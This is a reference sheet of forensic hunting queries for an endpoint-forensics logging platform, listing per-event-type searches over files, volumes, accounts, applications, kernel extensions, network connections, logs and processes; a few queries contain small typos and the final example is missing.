#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, UnixGroupName, PosixFileType, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFilename, ProductName, ProductVersion], limit=max)

Hunt uncommon file extensions

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | NOT (TargetFilename=*.jpg OR TargetFileName=*.png OR TargetFileName=*.pdf OR TargetFileName=*jpeg OR TargetFileName=*.csv OR TargetFileName=*.xls OR TargetFileName=*.xlsx OR TargetFileName=*.doc OR TargetFileName=*.docx OR TargetFileName=*.html OR TargetFileName=*.gif OR TargetFileName=*.txt OR *.ppt OR *.pptx OR *.log OR TargetFileName=*.htm OR TargetFileName=*.class OR TargetFileName=*.json OR TargetFileName=*.xml OR TargetFileName=*.xhtml) | regex("/(?<filename>(?<name>\w+)\.(?<extension>\w{1,5}))$", field=TargetFileName) | groupby([extension], function=[collect([aid, ContextTimeStamp, TargetFileName, SHA256HashData, name, extension]), count(extension)], limit=max) | _count < 100 | table([aid, ContextTimeStamp, TargetFileName, SHA256HashData, name, extension,_count], limit=max)

List all files in any /tmp/ folder

#event_simpleName=FileInfo | TargetFileName = "*/tmp/*" | table([aid, ContextTimeStamp, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)

Identify large files

#event_simpleName=FileInfo TargetFileName=*.tar OR TargetFileName=*.zip OR TargetFileName=*.gzip OR TargetFileName=*.part OR TargetFileName=*.tar.gz OR TargetFileName=*.gz OR TargetFileName=*.rar OR TargetFileName=*.tgz OR TargetFileName=*.bz2 NOT TargetFileName=*.log | Size > 999999999 | table([aid, ContextTimeStamp, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)

FsVolumeMounted

Show All Fields

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, Flags,VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

Show Volume Device Info

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectorIdentifier, Flags, VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork], limit=max)

Show Volume Media Info

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, Flags, VolumeBusName, VolumeBusPath, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

GroupAccount

Show all Fields

#event_simpleName=GroupAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | parseInt("GID") | table([time, aid, cid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

Users in group wheel

#event_simpleName=GroupAccount UnixGroupName=wheel ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

The UIDs returned can be queried using the UserAccount event for further user account information. For example:

#event_simpleName=UserAccount ForensicsCollectionIdentifier= UID=

InstalledApplication

Show all Fields

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([InstallDate, time, batchTime, aid, cid, ForensicsCOllectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchetecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)

Show results for a specific installed app of interest

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | AppName= <app name> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([time, aid, cid, InstallDate, batchTime, aid, cid, ForensicsCOllectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchetecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)

KernelExtension

Show all Fields

#event_simpleName=KernelExtension ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, MacBundleInfo, KernelExtensionName, MacBundleVersion, ExtensionIsLoaded, TargetFileName], limit=max)

Show if a specific kernel extension is loaded

#event_simpleName=KernelExtension ForensicsCollectionIdentifier=* | KernelExtensionName = <extension of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, MacBundleInfo, KernelExtensionName, MacBundleVersion, ExtensionIsLoaded, TargetFileName], limit=max)

Show only loaded kernel extensions (Needs to be enum to string first)

#event_simpleName=KernelExtension ForensicsCollectionIdentifier=* | ExtensionIsLoaded = 1 (true) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, MacBundleInfo, KernelExtensionName, MacBundleVersion, ExtensionIsLoaded, TargetFileName], limit=max)

LocalIpAddressIp4

Show all Fields

#event_simpleName=LocalIpAddressIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP4, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier], limit=max)

LocalIpAddressIp6

Show all Fields

#event_simpleName=LocalIpAddressIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP6, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier], limit=max)

LogEntry

Show all Fields

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show UTMP log records with attributes

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show all but UTMP log records

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | NOT FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show Remote login attempts

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogOrigin = \var\log\audit\audit.log* | ForensicsText=*screensharingd* OR *sshd* OR *login* OR *loginwindow* OR "*remoting_me2me_host*" OR *TeamViewer*team

Show macOS system.log entries

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogOrigin = "/private/var/db/system.log*" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show Apple Unified Logs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType=LOG_APPLEUNIFIED | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FfcLogOrigin, FfcLogSourceType, FfcLogConfidenceInterval, FfcStructuredLogEntry, ForensicsText], limit=max)

Show Apple System Logs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType=LOG_APPLESYSTEMLOG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FfcLogOrigin, FfcLogSourceType, FfcLogConfidenceInterval, FfcStructuredLogEntry, ForensicsText], limit=max)

Show spotlight log events

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType=LOG_APPLESPOTLIGHT | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FfcLogOrigin, FfcLogSourceType, FfcLogConfidenceInterval, FfcStructuredLogEntry, ForensicsText], limit=max)

MacMRU

Show all Fields

#event_simpleName=MacMRU ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | TargetCreationTime := rename(MacBookmarkTargetCreationDate) | TargetCreationTime := parseTimeStamp(field=TargetCreationTime, format=seconds) | TargetCreationTime := formatTime("%F %T", field=TargetCreationTime) | BookmarkCreationTime := rename(MacBookmarkCreationDate) | BookmarkCreationTime := parseTimeStamp(field=BookmarkCreationTime, format=seconds) | BookmarkCreationTime := formatTime("%F %T", field=BookmarkCreationTime) | VolumeCreationDate := formatTime("%Y-%m-%d %H:%M:%S") | VolumeCreationDate := parseTimeStamp(field=VolumeCreationDate, format=seconds) | VolumeCreationDate := formatTime("%F %T", field=VolumeCreationDate) | eval(VolumeMediaSize = VolumeMediaSize/1048576) | VolumeMediaSizeMB := rename(VolumeMediaSize) | round(VolumeMediaSizeMB) | table([time, BookmarkCreationTime, aid, cid, ForensicsCollectionIdentifier, MacBookmarkCreatorUID, MacBookmarkCreatorUserName, MacBookmarkDisplayName, TargetCreationTime, MacBookmarkTargetFileName, MacBookmarkTargetURL, MacBookmarkTargetPath, CFUrlResourcePropertyFlags, CFUrlVolumePropertyFlags, VolumeName, VoumeUUID, VolumeMountPoint, VolumeMediaSizeMB, VolumeIsRoot, MacMruIndex], limit=max)

Search by username of Bookmark creator

#event_simpleName=MacMRU ForensicsCollectionIdentifier=* MacBookmarkCreatorUserName= <insert Username> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | TargetCreationTime := rename(MacBookmarkTargetCreationDate) | TargetCreationTime := parseTimeStamp(field=TargetCreationTime, format=seconds) | TargetCreationTime := formatTime("%F %T", field=TargetCreationTime) | BookmarkCreationTime := rename(MacBookmarkCreationDate) | BookmarkCreationTime := parseTimeStamp(field=BookmarkCreationTime, format=seconds) | BookmarkCreationTime := formatTime("%F %T", field=BookmarkCreationTime) | VolumeCreationDate := formatTime("%Y-%m-%d %H:%M:%S") | VolumeCreationDate := parseTimeStamp(field=VolumeCreationDate, format=seconds) | VolumeCreationDate := formatTime("%F %T", field=VolumeCreationDate) | eval(VolumeMediaSize = VolumeMediaSize/1048576) | VolumeMediaSizeMB := rename(VolumeMediaSize) | round(VolumeMediaSizeMB) | table([time, BookmarkCreationTime, aid, cid, ForensicsCollectionIdentifier, MacBookmarkCreatorUID, MacBookmarkCreatorUserName, MacBookmarkDisplayName, TargetCreationTime, MacBookmarkTargetFileName, MacBookmarkTargetURL, MacBookmarkTargetPath, CFUrlResourcePropertyFlags, CFUrlVolumePropertyFlags, VolumeName, VoumeUUID, VolumeMountPoint, VolumeMediaSizeMB, VolumeIsRoot, MacMruIndex], limit=max)

MacFsEventRecord

Show All Fields

#event_simpleName=MacFsEventRecord ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetFileName, FsEventFlagString, FsEventFlag, FsEventId, FsEventNodeId, FsEventType], limit=max)

Show By Flag Event

#event_simpleName=MacFsEventRecord ForensicsCollectionIdentifier=* FsEventFlagString= <insert flag> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetFileName, FsEventFlagString, FsEventFlag, FsEventId, FsEventNodeId, FsEventType], limit=max)

Note: Replace INSERT FLAG with flags such as: Created Removed Renamed Modified PermissionChanged IsFile IsDirectory. For example, FsEventFlagString = Removed shows all FsEvents with Flag "Removed".

MacKnowledge

Show all Fields

Start

#event_simpleName=MacKnowledgeActivityStart ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName,KnowledgeActivityValue,KnowledgeActivityId, KnoweldgeActivitySourceBundleId, KnowledgeActivitySourceDeviceId, KnowledgeActivitySourceGroupId, KnowledgeActivitySourceUserId, KnowledgeActivityType, KnowledgeActivityTitle, KnowledgeActivityWebPageUrl, KnowledgeActivityNotificationBundleId, KnowledgeActivityCustomMetadataName, KnowledgeActivityCustomMetadataValue, KnowledgeActivitySafariHistory, KnowledgeActivityWebDomain], limit=max)

End

#event_simpleName=MacKnowledgeActivityEnd ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName,KnowledgeActivityValue,KnowledgeActivityId, KnoweldgeActivitySourceBundleId, KnowledgeActivitySourceDeviceId, KnowledgeActivitySourceGroupId, KnowledgeActivitySourceUserId, KnowledgeActivityType, KnowledgeActivityTitle, KnowledgeActivityWebPageUrl, KnowledgeActivityNotificationBundleId, KnowledgeActivityCustomMetadataName, KnowledgeActivityCustomMetadataValue, KnowledgeActivitySafariHistory, KnowledgeActivityWebDomain], limit=max)

Note: This query is for all available fields; a portion of fields may be blank. The condensed query will prune some empty fields.

Condensed Fields

Start

#event_simpleName=MacKnowledgeActivityStart ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName,KnowledgeActivityValue,KnowledgeActivityId], limit=max)

End

#event_simpleName=MacKnowledgeActivityEnd ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName,KnowledgeActivityValue,KnowledgeActivityId], limit=max)

Note: This query is condensed and prunes a lot of fields that may be blank. Any can be readded by appending them to the table statement.

Search by value

Start

#event_simpleName=MacKnowledgeActivityStart ForensicsCollectionIdentifier=* KnowledgeActivityValue= <Value to search by> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName,KnowledgeActivityValue,KnowledgeActivityId], limit=max)

End

#event_simpleName=MacKnowledgeActivityEnd ForensicsCollectionIdentifier=* KnowledgeActivityValue= <Value to search by> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName,KnowledgeActivityValue,KnowledgeActivityId], limit=max)

NetworkCloseIP4

Show all Fields

#event_simpleName=NetworkCloseIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkCloseIP6

Show all Fields

#event_simpleName=NetworkCloseIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP4

Show all Fields

#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP6

Show all Fields

#event_simpleName=NetworkConnectIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkEndPointDataUsage

Show All Fields

#event_simpleName=NetworkEndPointDataUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NetworkAttachmentFirstTimeStamp, NetworkAttachmentTimeStamp, NetworkAttachmentIdentifier, NetworkAttachmentSignature, IsNetworkHotspot, IsNetworkKnownGood, LiveRouteBytesInCount, LiveRouteBytesOutCount, LiveRouteConnectionAttempts, LiveRouteConnectionSuccesses, LiveRouteKind, LiveRouteKindAsString, LiveRoutePacketsInCount, LiveRoutePacketsOutCount, LiveRouteBytesInCount, LiveRouteBytesOutCount], limit=max)

Search by Live Route Bytes In

#event_simpleName=NetworkEndPointDataUsage ForensicsCollectionIdentifier=* LiveRouteBytesInCount > NUMBERINBYTES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NetworkAttachmentFirstTimeStamp, NetworkAttachmentTimeStamp, NetworkAttachmentIdentifier, NetworkAttachmentSignature, IsNetworkHotspot, IsNetworkKnownGood, LiveRouteBytesInCount, LiveRouteBytesOutCount, LiveRouteConnectionAttempts, LiveRouteConnectionSuccesses, LiveRouteKind, LiveRouteKindAsString, LiveRoutePacketsInCount, LiveRoutePacketsOutCount, LiveRouteBytesInCount, LiveRouteBytesOutCount], limit=max)

Note: Replace NUMBERINBYTES with a number in bytes. You can also replace LiveRouteBytesInCount with other fields such as LiveRoutePacketsInCount. You can also replace the comparison operator with other operators such as > or =.

Search by Live Route Bytes Out

#event_simpleName=NetworkEndPointDataUsage ForensicsCollectionIdentifier=* LiveRouteBytesOutCount > NUMBERINBYTES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NetworkAttachmentFirstTimeStamp, NetworkAttachmentTimeStamp, NetworkAttachmentIdentifier, NetworkAttachmentSignature, IsNetworkHotspot, IsNetworkKnownGood, LiveRouteBytesInCount, LiveRouteBytesOutCount, LiveRouteConnectionAttempts, LiveRouteConnectionSuccesses, LiveRouteKind, LiveRouteKindAsString, LiveRoutePacketsInCount, LiveRoutePacketsOutCount, LiveRouteBytesInCount, LiveRouteBytesOutCount], limit=max)

Note: Replace NUMBERINBYTES with a number in bytes. You can also replace LiveRouteBytesOutCount with other fields such as LiveRoutePacketsOutCount. You can also replace the comparison operator with other operators such as > or =.

NetworkListenIP4

Show all Fields

#event_simpleName=NetworkListenIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkListenIP6

Show all Fields

#event_simpleName=NetworkListenIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP4

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP6

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

OsVersionInfo

Show all Fields

 #event_simpleName=OsVersionInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| default(field=[AgentVersion], value="No Sensor Installed", replaceEmpty=true)
| table([time, MajorVersion, MinorVersion, OSVersionString, OSVersionFileName, OSVersionFileData, PlatformId, ProductName, ProductType, AgentVersion, SystemTimeZone], limit=max)

ProcessDataUsage

Show All Fields

#event_simpleName=ProcessDataUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetProcessName, LiveUsageTimestamp, ProcessTimeStamp, ProcessFirstTimeStamp, LiveUsageKind, LiveUsageOpt, LiveUsageTableId, LiveUsageWifiInCount, LiveUsageWifiOutCount, LiveUsageWiredInCount, LiveUsageWiredOutCount, LiveUsageWwanInCount, LiveUsageWwanOutCount, LiveUsageXInCount, LiveUsageXOutCount, SourceFileName, BundleID], limit=max)

Show All Fields with Live Usage Wifi In greater than NUMBERUSAGE

#event_simpleName=ProcessDataUsage ForensicsCollectionIdentifier=* LiveUsageWifiInCount > NUMBERUSAGE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetProcessName, LiveUsageTimestamp, ProcessTimeStamp, ProcessFirstTimeStamp, LiveUsageKind, LiveUsageOpt, LiveUsageTableId, LiveUsageWifiInCount, LiveUsageWifiOutCount, LiveUsageWiredInCount, LiveUsageWiredOutCount, LiveUsageWwanInCount, LiveUsageWwanOutCount, LiveUsageXInCount, LiveUsageXOutCount, SourceFileName, BundleID], limit=max)

Note: Replace NUMBERUSAGE with a wifi usage number. You can also replace LiveUsageWifiInCount with other fields such as LiveUsageWiredInCount. You can also replace comparison operator with other operators, such as > or =.

Show All Fields with Live Usage Wifi Out greater than NUMBERUSAGE

#event_simpleName=ProcessDataUsage ForensicsCollectionIdentifier=* LiveUsageWifiOutCount > NUMBERUSAGE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetProcessName, LiveUsageTimestamp, ProcessTimeStamp, ProcessFirstTimeStamp, LiveUsageKind, LiveUsageOpt, LiveUsageTableId, LiveUsageWifiInCount, LiveUsageWifiOutCount, LiveUsageWiredInCount, LiveUsageWiredOutCount, LiveUsageWwanInCount, LiveUsageWwanOutCount, LiveUsageXInCount, LiveUsageXOutCount, SourceFileName, BundleID], limit=max)

Note: Replace NUMBERUSAGE with a wifi usage number. You can also replace LiveUsageWifiOutCount with other fields such as LiveUsageWiredOutCount. You can also replace comparison operator with other operators, such as > or =.

ProcessRollup2

Show all Fields

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, ForensicsCollectionIdentifier, ProcessStartTime, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ProcessPriority, ProcessThreadCount, ProcessNiceValue, VirtualMemorySize, RGID, RSS, RUID, RawProcessID, SVGID, SVUID, TtyName, UID], limit=max)

Search for process information with a command line of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* CommandLine=<CommandLine of interest> | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, ProcessStartTime, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ParentProcessID, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, VirtualMemorySize, GID, RGID, RSS, RUID, SVGID, RawProcessID, SVGID, SVUID, TtyName, ControllingTerminal, UID], limit=max)

Search for process information with an image file name of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* ImageFileName=<ImageFileName of interest) | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, ProcessStartTime, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ParentProcessID, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, VirtualMemorySize, GID, RGID, RSS, RUID, SVGID, RawProcessID, SVGID, SVUID, TtyName, ControllingTerminal, UID], limit=max)

The RawProcessID returned per process can be queried using the Network* and RawBind* events for network data related to a specific process. For example:

